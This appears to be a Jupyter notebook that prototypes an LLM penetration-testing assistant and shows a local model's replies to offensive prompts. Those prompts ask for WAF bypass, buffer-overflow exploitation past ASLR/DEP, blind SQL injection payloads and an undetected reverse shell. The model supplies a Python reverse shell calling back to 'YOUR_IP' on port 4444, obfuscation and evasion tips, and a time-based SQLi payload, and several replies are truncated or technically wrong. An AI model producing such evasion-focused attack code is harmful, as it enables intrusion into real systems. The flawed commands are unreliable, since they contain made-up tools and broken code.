In [1]:
from src.agent.llm import Ollama
from src.agent.tools import TOOLS

In [42]:
available_tools = ', '.join([tool.name for tool in TOOLS])
available_tools

'gobuster, hashcat, Hydra, Nmap, searchsploit, sqlmap'

In [58]:
system_prompt = """As a proficient assistant in Penetration Testing, your task is to help an authorized user during a penetration testing assessment of a target system. 
The user will usually ask you how to do some task or he will tell you the results of some activity; you should always briefly expose your understanding of the required task, one or two sentences should be enough. 
When it is clear that you have a good understanding of the task you should propose possible solutions; a solutions should be paired with tools to perform it, however note that the user is most comfortable with the following tools: {tools}

Guidelines:
1. **Ask Questions** to understand the user's context or requirements.
2. **Do not assume any specific context** such as operating system or network setup without asking the user first.
3. **Tool Usage** provide example tool usage to solve the task, but let the user provide you the output.
4. **Tool Priority** prefer using the tools the user is most comfortable with""".format(tools=available_tools)

user_prompt = """{user}

Remember, to make sure the objective is clear you can ask questions.
"""

In [90]:
conversion_system_prompt = """Given a Penetration Testing plan in natural language you should detect the presence of commands to execute in the plan. Extract the commands from the plan and convert them into the provided JSON format.
    [
        {"thought": "considerations on command execution", "command": "a single command"}
    ]

**Detect Commands:**
- Text that would be typed directly into a terminal to perform an action.
- Often enclosed within code blocks like: ``` ... ```.
- Is something that can be executed programmatically.

IMPORTANT: 
1. If the plan doesn't contain any commands to execute provide an empty list [].

"""

conversion_user_prompt = """Penetration Testing Plan:
{plan}

Command Extraction Guidelines:
1. Only provide the JSON string
2. Provide an empty list if there is nothing to execute.
3. If a command contains a placeholder, such as <target>, the command is not valid.
4. Accuracy is paramount. Any errors in the extracted commands could have significant consequences."""

In [91]:
model = Ollama(
    model='mistral',
    client_url='https://945f-35-204-90-181.ngrok-free.app/'
)

In [92]:
def chat(user_input: str):
    yield from model.query([
        {'role': 'system', 'content': system_prompt},
        {'role': 'user', 'content': user_prompt.format(user=user_input)}
    ])
    
def get_commands(nl_plan: str):
    messages = [
        {'role': 'system', 'content': conversion_system_prompt},
        {'role': 'user', 'content': conversion_user_prompt.format(plan=nl_plan)}
    ]
    for ch in model.query(messages):
        print(ch, end='')
    print()

In [93]:
bypass_firewall = "I need to bypass a WAF using a technique that avoids detection. I've identified a few possibilities like encoding the payload, using a different encoding, or modifying the request headers. However, I need to determine which technique has the highest chance of success for this particular WAF. Is there any way to identify its specific rules or signatures to make an informed decision?"

plan = ''
for chunk in chat(bypass_firewall):
    print(chunk, end='')
    plan += chunk
print()
get_commands(plan)

 To help determine the most effective bypass technique for the identified Web Application Firewall (WAF), let's first gather some information about its specific rules or signatures. This will allow us to make an informed decision on the best approach to avoid detection.

We can use tools like `ZAP` (Zed Attack Proxy) or `OWASP ModSecurity Rule Set Analyzer` to analyze the WAF's rules and gain insights into its common patterns, rules, and signatures. This analysis will help us identify potential vulnerabilities in the WAF that can be exploited using encoding techniques, different encodings, or modified request headers.

Once we have a better understanding of the WAF's rules, we can proceed with testing each technique to determine which one has the highest chance of success for bypassing the WAF without detection.
For example, you could use `urlencode` or `hexencode` for payload encoding, `burp-suite` for modifying request headers, and `BeEF` (Browser Exploitation Framework) for executin

In [94]:
binary_exploit = "I need to create a custom exploit that targets a buffer overflow vulnerability in the 'system()' function of a Linux application. The application runs on a 64-bit system with a specific version of the glibc library. I need to understand the stack layout, function call conventions, and the exploit mitigations like ASLR and DEP implemented in this environment. Can you guide me on how to bypass these mitigations and achieve code execution?"

plan = ''
for chunk in chat(binary_exploit):
    print(chunk, end='')
    plan += chunk
print()
get_commands(plan)

 To create a successful buffer overflow exploit for the 'system()' function on a 64-bit Linux system with specific glibc version, we need to understand the stack layout, function call conventions, and bypass ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention).

First, let's gather information about the stack layout and function call conventions. We can use GDB (GNU Debugger) for this purpose:

```bash
gdb -q <target_binary>
layout
info register save
info registers
```

Next, we'll need to determine the base address of glibc and other important libraries using ASLR bypass techniques. You can use tools like PIE-loader or pwndbg (a GDB extension) for this purpose:
```bash
pie-loader -f <target_binary>
pwndbg -r <target_binary> --pid <process_id>
```

Now that we have the glibc base address, we can calculate the offset to reach the system() function by finding the position of the system() function in the glibc library and subtracting its address from the glibc bas

In [95]:
sql_injection_exploit =  "I need to exploit a SQL injection vulnerability on the login form of this web application. I've identified the vulnerability using a blind SQL injection technique, but I need to craft a query to extract the database schema and sensitive information from the database. Can you provide me with some advanced SQL injection payloads to achieve this goal, and how can I bypass any potential security measures like input validation and error handling?"

plan = ''
for chunk in chat(sql_injection_exploit):
    print(chunk, end='')
    plan += chunk
print()
get_commands(plan)

 To clarify, you've identified a blind SQL injection vulnerability in the login form of your web application, and you aim to extract the database schema and sensitive information without triggering any obvious errors or alerts. Here are some advanced SQL injection techniques and payloads that could help you achieve this goal:

1. Time-based Blind SQL Injection (TBTI): By measuring the response time of the application, you can determine if a certain condition is true or false in the database. For example, you can craft a query like `' OR SLEEP(5) --` to delay the response by 5 seconds if the condition is true.

2. Out-of-band Communication (OOB): If possible, establish an out-of-band channel for communication with the application. For example, you can use a subdomain takeover vulnerability or a misconfigured email server to receive responses from the application without triggering any errors on the login form.

3. Error-based Blind SQL Injection (EBSQLI): By analyzing the error messages

In [96]:
reverse_shell = "I've found a potential RCE vulnerability in a web application. How can I craft a reverse shell payload using Python that will execute on the server and connect back to my machine on port 4444? I need to bypass any security measures in place like WAFs and ensure the payload remains undetected. I'd also like to know what other techniques are available for delivering the payload, such as encoding or obfuscation."

plan = ''
for chunk in chat(reverse_shell):
    print(chunk, end='')
    plan += chunk
print()
get_commands(plan)

 Understood that you've discovered a potential Remote Code Execution (RCE) vulnerability in a web application and you wish to create a reverse shell using Python, bypass security measures such as Web Application Firewalls (WAFs), remain undetected, and connect back to your machine on port 4444.

To craft the reverse shell payload, we can use Python's netcat library (nc) or pyserial library. Here's an example of a simple Python reverse shell using netcat:

```python
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect('YOUR_IP', 4444)
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(['/bin/bash', '-i'])
```

To bypass security measures and ensure the payload remains undetected, you can:

1. Encode or obfuscate the payload using tools like base64, python's built-in `quopri`, or online encoders such as Mischief (https://mischief.sh) and CyberChef (https://cyberchef.org).
2. Use a steganography tool to hide th